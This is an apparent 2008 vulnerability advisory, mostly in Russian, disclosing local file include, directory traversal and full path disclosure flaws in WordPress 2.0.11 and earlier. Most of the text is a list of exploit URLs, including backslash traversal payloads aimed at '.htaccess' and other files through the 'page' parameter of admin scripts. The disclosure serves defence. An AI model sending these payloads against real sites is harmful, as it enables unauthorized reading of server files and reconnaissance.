Local file include, Directory traversal and Full path disclosure in WordPress

2008-01-02T00:00:00
ID SECURITYVULNS:DOC:18772
Type securityvulns
Reporter Securityvulns
Modified 2008-01-02T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметре page), а также в файлах, admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=

http://site/wp-admin/link-manager.php?page=

http://site/wp-admin/link-add.php?page=

http://site/wp-admin/link-categories.php?page=

http://site/wp-admin/link-import.php?page=

http://site/wp-admin/theme-editor.php?page=

http://site/wp-admin/plugins.php?page=

http://site/wp-admin/plugin-editor.php?page=

http://site/wp-admin/profile.php?page=

http://site/wp-admin/users.php?page=

http://site/wp-admin/options-general.php?page=

http://site/wp-admin/options-writing.php?page=

http://site/wp-admin/options-reading.php?page=

http://site/wp-admin/options-discussion.php?page=

http://site/wp-admin/options-permalink.php?page=

http://site/wp-admin/options-misc.php?page=

http://site/wp-admin/import.php?page=

http://site/wp-admin/admin.php?page=

http://site/wp-admin/admin-footer.php

http://site/wp-admin/admin-functions.php

http://site/wp-admin/edit-form.php

http://site/wp-admin/edit-form-advanced.php

http://site/wp-admin/edit-form-comment.php

http://site/wp-admin/edit-link-form.php

http://site/wp-admin/edit-page-form.php

http://site/wp-admin/menu.php

http://site/wp-admin/menu-header.php

http://site/wp-admin/import/blogger.php

http://site/wp-admin/import/dotclear.php

http://site/wp-admin/import/greymatter.php

http://site/wp-admin/import/livejournal.php

http://site/wp-admin/import/mt.php

http://site/wp-admin/import/rss.php

http://site/wp-admin/import/textpattern.php

http://site/wp-admin/bookmarklet.php?page=

http://site/wp-admin/cat-js.php?page=

http://site/wp-admin/inline-uploading.php?page=

http://site/wp-admin/options.php?page=

http://site/wp-admin/profile-update.php?page=

http://site/wp-admin/sidebar.php?page=

http://site/wp-admin/user-edit.php?page=

Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).

Local file include и Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php

http://site/wp-admin/index.php?page=\..\..\.htaccess

http://site/wp-admin/link-manager.php?page=\..\..\.htaccess

http://site/wp-admin/link-add.php?page=\..\..\.htaccess

http://site/wp-admin/link-categories.php?page=\..\..\.htaccess

http://site/wp-admin/link-import.php?page=\..\..\.htaccess

http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess

http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess

http://site/wp-admin/profile.php?page=\..\..\.htaccess

http://site/wp-admin/users.php?page=\..\..\.htaccess

http://site/wp-admin/options-general.php?page=\..\..\.htaccess

http://site/wp-admin/options-writing.php?page=\..\..\.htaccess

http://site/wp-admin/options-reading.php?page=\..\..\.htaccess

http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess

http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess

http://site/wp-admin/options-misc.php?page=\..\..\.htaccess

http://site/wp-admin/import.php?page=\..\..\.htaccess

http://site/wp-admin/admin.php?page=\..\..\.htaccess

http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess

http://site/wp-admin/cat-js.php?page=\..\..\.htaccess

http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess

http://site/wp-admin/options.php?page=\..\..\.htaccess

http://site/wp-admin/profile-update.php?page=\..\..\.htaccess

http://site/wp-admin/sidebar.php?page=\..\..\.htaccess

http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1687/

P.S.

Данные уязвимости в WP вместе с предыдущими (http://websecurity.com.ua/1686/) являются моими новогодними подарками.

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua